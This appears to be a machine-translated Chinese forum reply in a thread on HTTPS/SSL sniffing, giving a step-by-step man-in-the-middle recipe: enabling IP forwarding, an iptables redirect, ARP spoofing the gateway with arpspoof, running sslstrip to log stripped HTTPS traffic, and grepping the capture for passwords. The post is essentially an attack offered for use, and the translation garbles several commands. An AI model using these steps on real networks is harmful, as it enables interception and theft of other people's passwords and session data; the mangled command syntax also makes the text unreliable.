|
1
2
我知道你是怎么做的,但对我来说,ettercap-gtk(gui)一直是垃圾。我建议跳过ettercap,除非你想要简单的DNS欺骗,然后走另一条路。 让我给你一些步骤,首先为这次攻击设置iptables(中间人,amirite)并启用ip_forward(ing) echo“1”>/proc/sys/net/ipv4/ip_forward程序 iptables-t nat-A PREROUTING-p tcp--目标端口80-j REDIRECT--到端口1337(可以选择要发送到的任何端口) 现在,作为中间人:这里我们使用arpsopof: arpspoo-i wlan0(或任何接口)192.168.1.X(X通常是网关.1或.255) 然后使用SSLStrip,您可以继续进行/sslstrip.py-1 1337-w文件名(1337是前面的端口,filename是要将数据转储到的任何文件名) cat文件名(来自前面的文件名),甚至管道|grep“密码”或您正在查找的任何内容,或者您可以转储所有内容。该文件将填充捕获/剥离的https数据。 |
![]() |
Harry47 · HTTPS/SSL嗅探 12 年前 |